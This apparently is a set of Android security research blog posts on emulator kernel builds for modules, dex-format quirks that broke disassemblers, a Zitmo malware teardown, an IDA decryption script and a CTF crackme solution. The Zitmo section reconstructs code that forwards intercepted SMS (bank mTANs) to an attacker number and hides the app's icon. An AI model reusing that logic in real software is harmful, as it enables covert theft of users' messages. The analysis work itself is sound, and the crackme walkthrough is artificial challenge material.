Compiling an Android Emulator Kernel for Loadable Kernel Modules

So you want to rootkit the emulator? These are rough notes I took while attempting to get this working on my own machine (OSX 10.8.5) – results may vary. According to random posts I've seen, OSX is a bit finicky and no one really gets it to work right – on Ubuntu everything is apparently just peachy. You've been warned though, YMMV.
If you're on OSX, you must install libelf – this was the only dependency I was missing. If you don't have it, the build will fail partway through without being especially helpful about why.

Building the Kernel
Clone the emulator kernel repository, then check out the branch of the kernel we want;

git clone https://android.googlesource.com/kernel/goldfish

cd goldfish
git checkout -t origin/android-goldfish-2.6.29 -b goldfish

Before we build the kernel we must configure it. We don't want the default configuration (it doesn't actually let the emulator boot), and we want to ensure LKM support is present. Note that the ability to load modules is separate from the ability to unload them – you must enable both. First copy the goldfish_armv7_defconfig configuration, then manually change the LKM options (goldfish_armv7_defconfig defaults to modules being enabled and loadable, but not unloadable) along with any other features we need.

make ARCH=arm goldfish_armv7_defconfig

make ARCH=arm menuconfig
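
It's worth double checking that the module options actually landed in .config – these are the symbols I'd expect to see set, the force-unload one being optional;

CONFIG_MODULES=y
CONFIG_MODULE_UNLOAD=y
CONFIG_MODULE_FORCE_UNLOAD=y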

If you are compiling on OSX, you will want to manually edit the .config file to disable CONFIG_NETFILTER – simply comment that line out before proceeding. You will be prompted to confirm the change when you start compiling. If you do not make this change, you'll see an issue similar to this;

make[2]: *** No rule to make target `net/netfilter/xt_CONNMARK.o', needed by `net/netfilter/built-in.o'. Stop.
make[1]: *** [net/netfilter] Error 2
make: *** [net] Error 2
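
For reference, the kernel build treats a commented-out symbol as unset, so after the edit the relevant .config line should look like this;

# CONFIG_NETFILTER is not set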

Compile the kernel, modifying the CROSS_COMPILE switch as necessary for your build setup;

make ARCH=arm SUB_ARCH=arm CROSS_COMPILE=$ANDROID_NDK_ROOT/toolchains/arm-linux-androideabi-4.4.3/prebuilt/darwin-x86/bin/arm-linux-androideabi-

If you are unsure where to point CROSS_COMPILE, the following can help narrow it down, assuming you have $ANDROID_NDK_ROOT set;

find $ANDROID_NDK_ROOT | grep '\-gcc$'

Making the Emulator use the Newly Compiled Kernel
The easiest way to use the kernel immediately is to just point an already existing AVD image at it via the emulator command;

emulator -kernel arch/arm/boot/zImage -avd <avd_name> -verbose

You don't need -verbose, obviously, though it is helpful the first time through to watch for a potential segfault or a bad kernel image. If the "android" boot animation doesn't appear in the emulator window and nothing is streaming to the console, you likely borked one of the above steps. You should try enabling the "Use Host GPU" setting for the AVD as well, since this appears to drastically improve emulator performance on most MacBook Pros.
Another way to use the kernel is to copy arch/arm/boot/zImage into one of your platform system images – this will cause all AVDs using that platform to use the custom kernel. The path for that is something like $ANDROID_SDK_ROOT/system-images/android-17/armeabi-v7a/kernel-qemu.

If you run into something like below (verbose output from the emulator command, happens almost immediately);

emulator: Kernel parameters: qemu.gles=0 qemu=1 console=ttyS0 android.qemud=ttyS1 android.checkjni=1 ndns=3
emulator: Trace file name is not set

emulator: autoconfig: -scale 0.821094
Segmentation fault: 11

This is likely caused by some weirdness in the AVD from it not shutting down properly (or just from using it – the emulator is horrid). The easiest way to recover is to just kill it (rm -rf ~/.android/avd/*) and recreate the AVD.

Making a LKM
Shortly I'll post an example to github, but for now here is a very simple LKM that should compile fine.
The Makefile should be fully complete, though you may need to change the paths for both KERNEL_DIR and CCPATH;
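
A minimal sketch of what that Makefile can look like – the KERNEL_DIR and CCPATH values are placeholders for my local setup, the rest is the standard kbuild external-module pattern;

# Name of the module object to build
obj-m := android_module.o

# Placeholder paths: point these at your goldfish checkout and NDK toolchain
KERNEL_DIR := $(HOME)/android/goldfish
CCPATH := $(ANDROID_NDK_ROOT)/toolchains/arm-linux-androideabi-4.4.3/prebuilt/darwin-x86/bin

all:
	$(MAKE) -C $(KERNEL_DIR) M=$(PWD) ARCH=arm CROSS_COMPILE=$(CCPATH)/arm-linux-androideabi- modules

clean:
	$(MAKE) -C $(KERNEL_DIR) M=$(PWD) ARCH=arm CROSS_COMPILE=$(CCPATH)/arm-linux-androideabi- clean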

The helloworld code for android_module;
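
And a minimal sketch of the module itself – just printk on load and unload, nothing emulator specific;

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>

/* Called when the module is loaded via insmod */
static int __init android_module_init(void)
{
    printk(KERN_INFO "android_module: hello from the goldfish kernel\n");
    return 0;
}

/* Called when the module is removed via rmmod */
static void __exit android_module_exit(void)
{
    printk(KERN_INFO "android_module: goodbye\n");
}

module_init(android_module_init);
module_exit(android_module_exit);

MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("Hello world LKM for the Android emulator kernel");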

Dump both of these into any directory and run make after making the appropriate changes. You should then have an android_module.ko file.

From here just push it to the emulator via adb, then use insmod/lsmod/rmmod as needed and enjoy. Depending on the time I have for the rest of the week, I’ll try to dump some kernel modules I’ve written and used for malware analysis on my github.
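
For reference, the push/load/unload cycle looks something like this – the path under /data/local/tmp is just my habit;

adb push android_module.ko /data/local/tmp/
adb shell insmod /data/local/tmp/android_module.ko
adb shell lsmod
adb shell dmesg | tail
adb shell rmmod android_module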

Loose Documentation Leads to Easy Disassembler Breakages

As people have seen in the past, I tend to have a fun time finding edge-cases which break tools. Often you can find these types of edge-cases while reading documentation and cross-referencing the implementation in the systems you're validating. A pretty good example of this is highlighted in my BlackHat 2012 talk, where I was looking at the header_size field of the header section, which the documentation describes as always having the value 0x70. When looking at the open source tools, some checked to make sure this was true – others ignored it. The actual code in the Dex Verifier is as follows;
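
Paraphrasing from memory rather than quoting the AOSP source, the check amounts to something like this;

/* Paraphrased C sketch of the header size handling in the dex verifier */
if (pHeader->headerSize < sizeof(DexHeader)) {
    /* Too small to contain the structure we know about: reject */
    LOGE("Bad header size: %u\n", pHeader->headerSize);
    return false;
}
/* Anything >= sizeof(DexHeader) (0x70) is accepted and the extra bytes are
 * skipped over, which keeps the verifier forward compatible. */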

From this we can see the actual implementation doesn't care what the size is, as long as it is at least as large as the current structure size, which is 0x70. This allows the verifier to be forward compatible, though anyone creating a tool from the documentation alone would likely miss this and assume a fixed value.

This leads me to two extremely easy breakages which I never mentioned in my talk, but which I noticed IDA Pro 6.4 and Radare would fail against. The first issue that both IDA Pro and Radare broke on was a bad file magic. According to the documentation, the magic bytes are the following;

DEX_FILE_MAGIC
embedded in header_item

The constant array/string DEX_FILE_MAGIC is the list of bytes that must appear at the beginning of a .dex file in order for it to be recognized as such. The value intentionally contains a newline ("\n" or 0x0a) and a null byte ("\0" or 0x00) in order to help in the detection of certain forms of corruption. The value also encodes a format version number as three decimal digits, which is expected to increase monotonically over time as the format evolves.

ubyte[8] DEX_FILE_MAGIC = { 0x64 0x65 0x78 0x0a 0x30 0x33 0x35 0x00 }
= "dex\n035\0"

Note: At least a couple earlier versions of the format have been used in widely-available public software releases. For example, version 009 was used for the M3 releases of the Android platform (November–December 2007), and version 013 was used for the M5 releases of the Android platform (February–March 2008). In several respects, these earlier versions of the format differ significantly from the version described in this document.

So one might assume that the currently accepted magic bytes will be exactly "dex\n035\0" – though they would be wrong in assuming this. If we take a look at the code in DexFile.h;
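
From memory, the relevant defines in DexFile.h look roughly like this;

/* The constant prefix of the magic, followed by the accepted version strings */
#define DEX_MAGIC              "dex\n"
#define DEX_MAGIC_VERS         "036\0"
/* Older, still-valid version string used up through API level 13 */
#define DEX_MAGIC_VERS_API_13  "035\0"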

We can see that there are constant magic bytes of "dex\n", but the versioning afterwards – which is only loosely explained in the documentation – has multiple options. From API level 14 on, the verifier has accepted both "036\0" and "035\0" as valid version portions of the magic bytes. Since the magic bytes are not part of the checksum or the signature of the dex file, one can simply bump the version number without any specialized tools – doing it with a hex editor is fine. This led to Radare failing to load the file and IDA Pro thinking the file was corrupt, with the following dialog and log output;

Corrupt File Dialog

I originally reported this issue to Hex-Rays on January 22nd, 2013 and received a thank you and a fix back from them only two days later on the 24th. I'm unsure whether they sent this out to all their customers or have it bundled into their latest packages, but you should easily be able to request it if not. For Radare I submitted a patch for this issue which was quickly merged upstream by the extremely proactive author of the tool.

The second breakage, which only directly affected IDA Pro, revolved around the file size as dictated by the dex_header versus the actual file size. IDA Pro was comparing the two and, if they were not exactly equal, assumed the file was corrupt. The documentation states "size of the entire file (including the header), in bytes", though the implementation doesn't actually care – as seen in DexSwapVerify.cpp;
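
Again paraphrasing rather than quoting, the relevant check amounts to roughly this;

/* Paraphrased sketch of the length check in the dex swap/verify pass */
if (expectedLen != length) {
    if (expectedLen > length) {
        /* Truncated file: the header claims more data than we were given */
        LOGE("ERROR: Bad length: expected %u, got %u\n", expectedLen, length);
        okay = false;
    } else {
        /* Trailing data beyond what the header describes: warn and continue */
        LOGW("WARNING: Odd length: expected %u, got %u\n", expectedLen, length);
    }
}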

As we can see from the above, the actual length must be at least as large as the expected length, most likely to reject truncated files. It can easily be larger though, which just produces a warning while processing of the dex file continues. However, the same corrupt file dialog, with this logging message, comes up when such a file is loaded in IDA Pro;

Corrupt File Dialog

This was also fixed on the same timeline as the other issue I reported to Hex-Rays, so if you run across any files like this you will be prompted with this dialog;

Extra data

Just two small issues that came about from looking at the implementation of the file format. These edge-cases always seem to exist in every system, especially when creating reversing/disassembling/analysis tools.

Javascript Malware Cross-Contamination in Android apks

A colleague of mine, specifically from a different AV vendor, was poking around some files and was curious as to what these somewhat odd files were;

VirusTotal Analysis Sha1: e4105ae117e62c784e26ae113a6119bd33a570cf
VirusTotal Analysis Sha1: 16111c45832a20914cfd9306501b406e2ae89b58

An apk (Android package) which is being detected by a ton of vendors as having a javascript trojan dropper inside of it. Wait, what? Is this some interesting new breed of Android malware, possibly leveraging USB attacks too!? Well, no – no it isn't; it's actually just a curious case of cross-contamination.

These files appear to be “infected” inside the embedded HTML files;

We can see the offending code which is being flagged has nothing to do with any of the actual Android parts. We can confirm this is the actual detected portion by extracting the HTML file and looking its sha1 up on VirusTotal, which gives us;
VirusTotal Analysis Sha1: 3c4e3917661442be9ec92adf6ba5b93989a4dd7e

So does this seem intentional or accidental? Was someone actually trying to infect Android devices, or was this just a strange mishap? I'm inclined to believe it was a coincidence: both of the applications are the Android settings application, "com.android.settings", and are signed with the commonly found AOSP debug signer. What appears to have happened is that someone was compiling the AOSP, possibly for a custom ROM, on an infected host. The virus on that machine injected the javascript loader code into these HTML files, and the APKs were then bundled with the infected files inside. We can see that these were actually properly bundled;

The interesting part is that the signature did verify, meaning that at the time this APK was signed, the infected javascript was already included.
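
If you want to check that yourself, jarsigner will happily confirm it – the filename here is just a placeholder;

jarsigner -verify -verbose infected_settings.apk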

So did this actually do anything to devices? No – not really, though there may be someone out there running a custom ROM with all of these files on their device. Since the urls being injected are all long since dead, there shouldn't be any adverse side effects. It also appears that the application only reads the contents of the HTML files and loads them into an AlertDialog, where that javascript should never actually execute.

As a last side note – I did edit the output displayed in this blog to read "hxxp" as opposed to "http". When I didn't do this, even though the scripts were not being executed, Google Safe Browsing would block me from ever seeing my own blog :)

Android Zitmo Analysis: Now you see me, now you don’t

Early last week, Denis from Kaspersky blogged about a new Zitmo (Zeus in the Mobile) variant which was affecting both Android and Blackberry. After some digging I was finally able to turn up a sample for analysis. Originally I figured it would be the same old sample as before – it wouldn't do much and not be very sophisticated at all. Turns out I was half right: most of it was identical to previous samples, though I did learn a new little trick from the malware this time around.

After I did a tear down I submitted a sample to Mila over at the Contagio Mobile Dump, so if you’d like to follow along the sample I was dissecting you can find it here.

Firing up our trusty keytool, we can look at the certificate and try to get an estimated date for when this file was created;
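
Something along these lines pulls the signing cert out of an APK – the APK filename is a placeholder, and CERT.RSA is just the typical name inside META-INF;

unzip -p zitmo_sample.apk 'META-INF/*.RSA' > cert.rsa
keytool -printcert -file cert.rsa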

So, assuming the malware author hasn't been messing around with timestamps, the malware was created on or before July 24th of this year – and signed on that day as well. As a sanity check, the bundled Android debug certificate is consistent with this, since it was created before that date. This is in no way concrete proof that it was actually built/signed on that day – but it does give us a decent idea of the timeframe.

The next piece of interest lies within the AndroidManifest.xml – let's see how the author intends this application to be started;

According to the AndroidManifest above, we can see the application has four main entry points;

  • MainActivity – launched as the main activity, which should be visible by the launcher/tray
  • ActionReceiver – launched when the HOME, BOOT_COMPLETED or USER_PRESENT intent is fired by the system
  • SmsReceiver – launched when the SMS_RECEIVED intent is fired, with a priority of Integer.MAX_VALUE
  • RebootReceiver – launched when the REBOOT or ACTION_SHUTDOWN intent is fired

This seemed like a few too many receivers right off the bat – it seems odd that there is a reboot receiver; maybe the author was trying to do more than just intercept SMS messages? Let's first dig into the code and see how the malware gets started. Loading up IDA Pro and a terminal with baksmali, there is something we can notice right away: the authors were using the latest Android SDK – there is a ton of support code in the android/support directory used for backwards compatibility. It's actually a bit funny, as there is more code in those files than in the malware itself!

Looking at the MainActivity default create method, we can see the only code which a user might actually see when the malware is launched;

MainActivity.onCreate

MainActivity.onCreate, cleaned up a bit


Essentially the bulk of the code just checks a PersistenceManager object, which is a wrapper around the normal Android SharedPreferences object, to see whether the application has been run before. If it has not, it will mark the first run as having occurred, followed by calling the SmsReceiver.sendInintSms() function. This function, pictured below, gets the default admin number (+46769436094) and sends it the message "INOK".
SmsReceiver.sendInintSms()
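
Roughly, that boils down to the following – the method name and number come from the sample, the rest is an illustrative reconstruction;

import android.content.Context;
import android.telephony.SmsManager;

public class SmsReceiverSketch {
    public static void sendInintSms(Context context) {
        // Default admin number hardcoded in the sample
        String adminNumber = "+46769436094";
        // Report the new infection to the admin number
        SmsManager.getDefault().sendTextMessage(adminNumber, null, "INOK", null, null);
    }
}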


The next receiver to look at is the ActionReceiver. This is also very simple – essentially, if the intent is either BOOT_COMPLETED or USER_PRESENT, it will attempt to kick off the MainActivity, which would cause the code above to be launched. This is also gated by the same isFirstLaunch function from the PersistenceManager class. The cleaned up code for this receiver is below, and is pretty self explanatory as well;
ActionReceiver.onReceiver(…)


The main functionality of the malware is located where it has been for the last few Zitmo samples, inside the SmsReceiver. The onReceive method essentially houses a large switch statement which will allow the following commands to be parsed;

  • “on” – replies “ONOK” if sent from admin #, then sets the sms interceptor on
  • “off” – replies “OFOK” if sent from admin #, then sets the sms interceptor off
  • "set admin ${#}" – replies "SAOK" if sent from admin #, then sets a new admin # to use

All of the commands above have their broadcast aborted, so no other application should receive the SMS message. If any SMS other than the commands above is received, the code follows a simple path: the broadcast is aborted and the message is forwarded to the admin number in the format "message ${SMS_BODY}, F: ${SMS_SENDER}". These basic commands, combined with a PC infected with Zeus, are enough for the authors to programmatically intercept mTANs from what would appear to be German bank users.
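
Pulling the above together, the handler behaves roughly like this sketch – the helper names are illustrative stand-ins for the sample's own persistence code, not the actual decompiled method;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.SmsManager;
import android.telephony.SmsMessage;

public class SmsReceiver extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        Bundle bundle = intent.getExtras();
        if (bundle == null) return;
        Object[] pdus = (Object[]) bundle.get("pdus");
        SmsMessage sms = SmsMessage.createFromPdu((byte[]) pdus[0]);
        String body = sms.getMessageBody().trim();
        String sender = sms.getOriginatingAddress();

        if (isAdmin(sender) && body.equalsIgnoreCase("on")) {
            setInterceptor(true);
            reply(sender, "ONOK");
        } else if (isAdmin(sender) && body.equalsIgnoreCase("off")) {
            setInterceptor(false);
            reply(sender, "OFOK");
        } else if (isAdmin(sender) && body.toLowerCase().startsWith("set admin")) {
            setAdmin(body.substring("set admin".length()).trim());
            reply(sender, "SAOK");
        } else {
            // any other SMS is forwarded to the current admin number
            // (in the real sample this is presumably gated by the on/off flag)
            reply(getAdmin(), "message " + body + ", F: " + sender);
        }
        // nothing else on the device sees the message
        abortBroadcast();
    }

    private void reply(String number, String text) {
        SmsManager.getDefault().sendTextMessage(number, null, text, null, null);
    }

    // stubs so the sketch is self-contained; the real sample persists these values
    private boolean isAdmin(String n) { return true; }
    private String getAdmin() { return "+46769436094"; }
    private void setAdmin(String n) { }
    private void setInterceptor(boolean on) { }
}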

So what, right? I said there was something interesting about this malware – yet everything described so far has been old stuff. Well, the interesting part for me came when I looked at the last receiver, which didn't seem necessary; the malware already has all the code it needs to function, right? It turns out it is actually going to attempt to hide itself from the user on a reboot. If we look back at the AndroidManifest.xml, we can see the activity tag which lets the application appear in the launcher/tray of the device;

Previously, we’ve seen malware that avoids putting this into the manifest, trying to hide from the user. In this case, the malware does want to be found and hopefully executed by the user. The trick is, they only want this to be visible to the user for one boot. If we take a look at the RebootReceiver.onReceive function, we can see a simple code path that checks for the REBOOT or ACTION_SHUTDOWN intents. If either is caught by their receiver, it will call the MainActivity.hideIcon() function. The pseudo code for this function is as follows;
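
Presumably something along these lines – setComponentEnabledSetting is the standard API for disabling a component at runtime, though the surrounding structure here is my reconstruction;

private void hideIcon() {
    // Dynamically disable the launcher activity component; the manifest entry stays,
    // but the icon disappears from the launcher after the next reboot
    PackageManager pm = getPackageManager();
    ComponentName launcher = new ComponentName(this, MainActivity.class);
    pm.setComponentEnabledSetting(launcher,
            PackageManager.COMPONENT_ENABLED_STATE_DISABLED,
            PackageManager.DONT_KILL_APP);
}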

This code will dynamically disable the component, even though it is still declared within the AndroidManifest.xml. This means that on reboot the icon will no longer be present in the launcher/tray of the device, but the other receivers should still remain active. While this isn't rocket science – it's mainly just understanding the Android APIs – it's something I've never seen any malware do. Performing a few Google searches, it doesn't seem to be something widely used or deployed in practice. I did find a few legitimate applications that used this to be "less annoying" to a user and hide when they weren't wanted. This approach is also recommended for things like an optional BOOT_COMPLETED receiver, such as an optional service that a user might not want from an application.

TL;DR – You can dynamically disable a component in your Android application, effectively "hiding" yourself from a user's launcher/tray.

Dexploration: What a default Dex looks like

During the research phase of my Blackhat talk, I was digging into detecting the default layout of a dex file, as generated by the normal dx tool. Originally, my concept was that I wanted my tool to "stack" things inside the file the same way that the dalvik compiler would, but I couldn't find any actual resources describing what this looked like. After a few hours of digging through AOSP code and tearing apart an actual dex file to look at the innards, I came up with the quick little ASCII diagram below;
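
As a rough reference, the top-level ordering below is the one from the dex format documentation – header, then the id lists, then class_defs, with everything else packed into data – the interesting detail being how dx orders things inside that data section;

+--------------+
| header       |
+--------------+
| string_ids   |
| type_ids     |
| proto_ids    |
| field_ids    |
| method_ids   |
| class_defs   |
+--------------+
| data         |
|  (map_list,  |
|   code,      |
|   strings,   |
|   ...)       |
+--------------+
| link_data    |
+--------------+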

The output of APKfuscator actually ended up being quite different from the above mapping. It's definitely possible to retain the structure, however the sections can easily be interchanged. The resulting sections from my tool look like the following;

The normal dx compiler appears to always lay things out the same way, so if a dex file has been through a post-compilation modification tool (e.g. APKfuscator or (bak)smali), it might be possible to see that it has been "changed". If someone were to develop a tool that looks for patterns in how this data is laid out, it could lead to some interesting results. Being able to detect these changes and patterns, run at a large enough scale, could be an interesting tactic for quickly finding out whether someone has messed with a file. Hopefully I'll have more time to research this area and either prove or disprove this theory. Until then, hopefully the small ASCII layouts help someone else with whatever dalvik research they're doing.

A Lesson in Safe Dex
Presenting at Blackhat 2012

It's been almost a full week since my talk, Dex Education: Practicing Safe Dex, though I think I'm only now beginning to recover. The past few months have truly been a whirlwind of both dissecting malware at Lookout and putting together a solid presentation for BlackHat. So far I've been unable to draw a crowd like Charlie, though maybe someday I'll have people sitting in the aisles fighting for a seat during a presentation. Until then, the people who went will just have to deal with the extra legroom. Overall the presentation seemed to go over pretty well, with some interesting chats afterwards with some smart people. A few people were interested in the slides and proof of concept code, so I told them I would tweet them out and also make a blog post about it.

My slides are available here, with the proof of concept code hosted on my github page here. The proof of concept crackme code will be on the same github page shortly.

I've got some extra content that I wasn't able to fit into the slide deck – heck, it was 96 slides as-is after trimming some things out. While I didn't intend to cover every possible way to break analysis tools, I wanted to cover as much as possible. Over the course of a few days or weeks, I'll try to roll out details on my blog about how certain things worked, mainly for people who were unable to attend the presentation, hear my explanations or ask me things at the conference. Feel free to reach out to me if there is anything I've missed or that you would like a better explanation of.

A few people asked me about Blackhat and Defcon – wondering if they're worth attending. So to step onto a soapbox just for a minute, I'll give the mini speech I normally give people. Conferences are only worth what you put into them: go to talks that seem interesting and are outside of your direct field of work. Why attend talks outside your direct field? I've found it's a great way to find different perspectives, which can often be related back to your own work and field. It is also quite hard to appreciate a talk on something that you deal with daily – definitely important to keep this in mind if you do see those types of talks. As a presenter myself, I found it exceptionally hard not to go too low level while still feeling like I could add value for everyone in the audience. After attending the talks you chose, meet the presenters and pick their brains; this is honestly where you can learn the most. As I said, it's really hard to make a presentation accessible for a whole audience, and talking directly with these people will give you so much more information than the slides often do. The people you meet at the bars (for Blackhat @ Caesars, go to the Galleria bar) are often people you already talk to online. Make friends, go outside that comfort zone and buy some people drinks. Most everyone is friendly; if they aren't – don't drink with them. Almost all conferences are worth going to, Blackhat and Defcon included, mainly due to the talent they attract that you can find hanging out at the bars.

Probably the greatest thing about Blackhat for me was meeting some really great people I'd only had the pleasure of talking to online. Talking with Mila, the mind behind Contagio Dump, was really great – I was able to pay her back a little, with a beer or two, for all the hard work she does. I got to talk with some of the original DroidSecurity (now AVG) guys, Elad and Oren – it's never a dull moment talking to an Israeli reverse engineer, just look at Zuk. Another interesting person I got to hang out with was alongside me in the malware talk track, @snare. He did some crazy things with EFI rootkits for OSX – pretty scary and interesting stuff all in the same talk.

People often say it isn't what you know, but who you know. I'd argue the security space is a yin and yang of both: to be a valuable (reverse) engineer you need to know your stuff and know the people who can help you succeed.

Enough on this soapbox, hopefully you enjoy the slides and code. If you ever run into me at a conference – let’s have a beer or two and chat.

Mobile Security Meetup, DexTemplate and smali-mode!

Tonight there was a great meetup at the Lookout HQ, Mobile Security and Privacy – I got to meet a bunch of really smart mobile developers. The topic at hand was one close to me: reverse engineering Android applications. The concept was to show developers how easy it is to do and to help them understand how an attacker might see their code. Along with showcasing the normal tools people use in their day-to-day work, one of my coworkers, Emil, gave a great little overview presentation on how reversing is done for Android. After the demonstration, Emil had some prepared crackmes for people to try; most of the engineers did surprisingly well for never having reversed anything before!

After talking with a few people who were asking about reversing, I realized I've never really mentioned 010 Editor. It is by far one of the best hex editors I've ever used, with excellent template support. One of the best parts is that, a little over half a year ago, they came out with a fully native OSX client. On top of that, Jon Larimer has created a DEX template for it, available on his github. This is definitely a great way to visualize a dex file and look for anomalies in it.

Recently I’ve actually submitted some pull requests which Jon has accepted to better parse the dex files. They should be able to parse the latest dex files generated by the jellybean toolkit and even handle some “oddities” that I’ll be releasing at my BlackHat 2012 talk.

Along the way to completing my BlackHat talk, Dex Education: Practicing Safe Dex, I finally updated smali-mode for emacs. It's available on my github page. It should have syntax highlighting for just about all the elements found inside a smali file – along with the newer jumbo opcodes.

Around the same time as my presentation at BlackHat, I'll be posting the slides and proof of concepts to my github. So check back soon for some interesting ways to break (and fix) disassembly/decompilation tools for Android.

Static decryption for Android LeNa.[b/c] using IDA Pro

Recently at Lookout we blogged about a newer flavor of Legacy Native (LeNa). This variant is extremely similar to the other ones we've found in the past and blogged about in October of 2011; the full teardown I wrote can be found in pdf form here. The samples for both LeNa.b and LeNa.c have been added to the Contagio Mini Dump.

While going through some samples I decided to throw together a quick IDC script for IDA Pro to help decrypt the commands and variables without executing the code. The decryption isn't hard – in fact it ends up just being an XOR with 0xFF – though if you haven't dealt with IDA Pro or ARM before, it might look a bit confusing at first. Below is the commented decryption function from one of the specific LeNa samples;

Simple XOR with 0xFF


The IDC script is really simple; the current version can be found on github and is featured below;
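
The version below is a simplified sketch of the same idea rather than the exact script from github – decode bytes at the cursor by XOR'ing with 0xFF until the terminator, comment the result, then comment each data xref;

// Simplified IDC sketch: XOR-decrypt a NUL-terminated string at the cursor
static DecryptLeNaString()
{
    auto ea, i, b, decrypted, xref;

    ea = ScreenEA();                 // start at the highlighted address
    decrypted = "";
    i = 0;
    b = Byte(ea);
    while (b != 0xFF && i < 256) {   // encrypted 0xFF decodes to the 0x00 terminator
        decrypted = decrypted + form("%c", b ^ 0xFF);
        i = i + 1;
        b = Byte(ea + i);
    }

    Message("Decrypted: %s\n", decrypted);
    MakeComm(ea, decrypted);         // comment at the data itself

    // comment every data xref that uses this encrypted blob
    xref = DfirstB(ea);
    while (xref != BADADDR) {
        MakeComm(xref, decrypted);
        xref = DnextB(ea, xref);
    }
}

static main()
{
    AddHotkey("/", "DecryptLeNaString");
}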

The script should be really easy to follow; I tried to comment it well enough. Essentially, when you load the script it binds the decryption function to the "/" key. Find the pointer to the encrypted data, like below;

Highlighted pointer to the encrypted data


Next, just follow the pointer to its location in the text section. Once the encrypted data is highlighted, simply hit the assigned hot-key "/" and let the script do its job. The script will dump the decrypted message to the output window and also add a comment next to the pointer, as seen below;

The script also traverses back to all the cross references (xrefs) and will add a comment to all those spots where this variable is used.

The original usage in the decryption function

The main use of the decrypted data in another function


Nothing too fancy or complicated, though it was a nice way to get into IDC scripts for IDA Pro. It's also a good way to start segueing people who may only have used baksmali or dex2jar into using IDA Pro for ARM reversing.

Oops, did I publish that in the AOSP?

A while back when grep’ing through the AOSP for package manager references, I noticed something weird;

What’s this directory? What is contained in it? Let’s look at the readme;

Oops! Did someone mean to publish this repo? It's a bunch of experimental and interesting code. Granted, it's a bit old now, but still very interesting to look at. Specifically, there is what looks to be the precursor to fragments and UI testing automation, done and committed before the final work landed in AOSP. There is also the DroidDreamCleaner utility, which is interesting – while it was a fix for an old issue, it's neat to see how Google coders handled the issue without having to reverse it. We can even see a "DreamThreater" application which looks like some work done toward an Android screen saver. Sadly not all of this code compiles, since it relies on code which isn't accessible to us in the released branches of AOSP. It seems this code may have been mistakenly committed to the public branch after the kernel.org mishaps, as it appears to have been made public after AOSP became available on Google's own servers.

If you don’t have all of AOSP pulled, you can get it by just cloning the following repository;

Again, nothing groundbreaking – but definitely an interesting repository of code to take a look at, if only to see how Google coders work on "internal" code which isn't released, and to see the comments and documentation that are sometimes stripped from AOSP :)

InsomniDroid – crackme solution

It's a bit amusing that this solution for the InsomniHack CTF challenge named "InsomniDroid" was written up past midnight because I couldn't sleep. Regardless, this was typed up as a play-by-play analysis taken from my crib notes from when I actually solved the crackme, so bear with me as it may read a bit odd. While some of the steps might seem odd, I find it is often just easier to tackle each APK in the same manner. This sets up a nice way to quickly find the call-stack and how things get executed and where. When tackling this challenge, I attempted to only use baksmali, as opposed to any other tools, for simplicity and because not everyone has IDA Pro. Anyway, if you haven't downloaded the challenge yet you can get it from root-me.org or from this local mirror (MD5: c2f94fd52c8f270e66d8b16e07fe93e4). If you haven't solved the challenge yet, I'd recommend stopping here and giving it a good try.

Starting off, we should take a quick look at the AndroidManifest.xml through AXMLPrinter, which shows us the main activity;

Now we know where to start our search without even opening the app yet; toss the crackme into baksmali and get ready for the output. There are no anti-baksmali tricks in place, so we can look right at the main activity, InsomniActivity. The only interesting bits for us are the call to the compute method on keyBytes and the setting of an onClick listener for the validate button;

Seems weird that we’re computing something, though never doing anything with the returned result. Let’s just take note of that and come back later. If we look into the onClick listener (InsomniActivity$1) we can see what is going on deeper in the app;

Here we can see the bulk of this onClick listener just grabs the text from the EditText widget and uses it as a parameter for the checkSecret function. Now onward to the checkSecret function;

Ok, this doesn't help us much. As we can see from the inline comments I put above, all it's doing is taking a SHA-256 hash of our input and comparing it to secretHash – which obviously must also be a SHA-256 digest. Let's see if we can find this being set anywhere;

Only one hit – this is good. Let's go back into Compute.smali and check out what's actually going on. Once we get in here we can see what appears to be some leftover code, along with an array-fill for the secretHash which triggered the sput-object hit in the search we just performed. Let's get the hash;

6152587ede8a26f53fd391b055d4de501ee8b2497fe74f8fd69f2c72e2f3e37a

And toss that into hashcat… Maybe it's an easy one to get and I won't have to do any other work… Probably not – that would be a brute force challenge and not a crackme, and definitely not something that simple from someone named "crypto girl". So let's keep looking!

Looking back at Compute.smali, let's look into that compute([B) function we noticed being called earlier in the APK – the one whose return value was never used. This one looks interesting because (1) it seems left over, being called once without its return value used, and (2) it's the only place certain leftover variables like c1_null and c2 are touched, and it also expects the keyBytes parameter, which we also have a variable for.

This seems interesting… It takes keyBytes as a parameter, uses them to create a SecretKeySpec, then uses ivBytes to initialize an IvParameterSpec. Then it attempts to decrypt the c1_null variable, though it does nothing with the return value. After that, it decrypts something much larger and again does nothing with the value. Essentially this maps out to the following java code;
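
A reconstruction of what that maps to – the field and variable names match the ones above, while the AES/CBC/NoPadding transformation is my assumption based on the 16-byte block sizes observed below;

import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class Compute {
    // ivBytes, c1_null and c2 are byte[] fields filled in elsewhere in the class
    static byte[] ivBytes;
    static byte[] c1_null;
    static byte[] c2;

    static byte[] compute(byte[] keyBytes) throws Exception {
        // Exact transformation string is my reconstruction, not lifted from the smali
        SecretKeySpec key = new SecretKeySpec(keyBytes, "AES");
        IvParameterSpec iv = new IvParameterSpec(ivBytes);
        Cipher cipher = Cipher.getInstance("AES/CBC/NoPadding");

        cipher.init(Cipher.DECRYPT_MODE, key, iv);
        byte[] result = cipher.doFinal(c1_null);   // 16 bytes, never used by the caller

        cipher.init(Cipher.DECRYPT_MODE, key, iv);
        byte[] p2 = cipher.doFinal(c2);            // the much larger blob, also unused

        return result;
    }
}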

At this point I'm assuming I just solved it – run the app, look at the output… Garbage – it's not UTF-8 (or UTF-16) characters. That can't be it – I don't think the challenge would be to output non-ascii characters!

After staring at this a bit longer, I decided to look at the lengths of what is being output. result always has a length of 16. p2 ends up with a length that is always divisible by 16… Well – let's try some operations between the two resulting arrays that aren't being used. The first one I tried was XOR'ing them together (everyone loves XOR: malware writers, crackme writers, etc.) – and this ended up being exactly what needed to be done, as the snippet below shows.
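
Something like the following, cycling the 16-byte result across p2 – again a reconstruction of the idea rather than the exact code I ran;

// XOR the two unused decryption outputs together, repeating result over p2
byte[] plaintext = new byte[p2.length];
for (int i = 0; i < p2.length; i++) {
    plaintext[i] = (byte) (p2[i] ^ result[i % result.length]);
}
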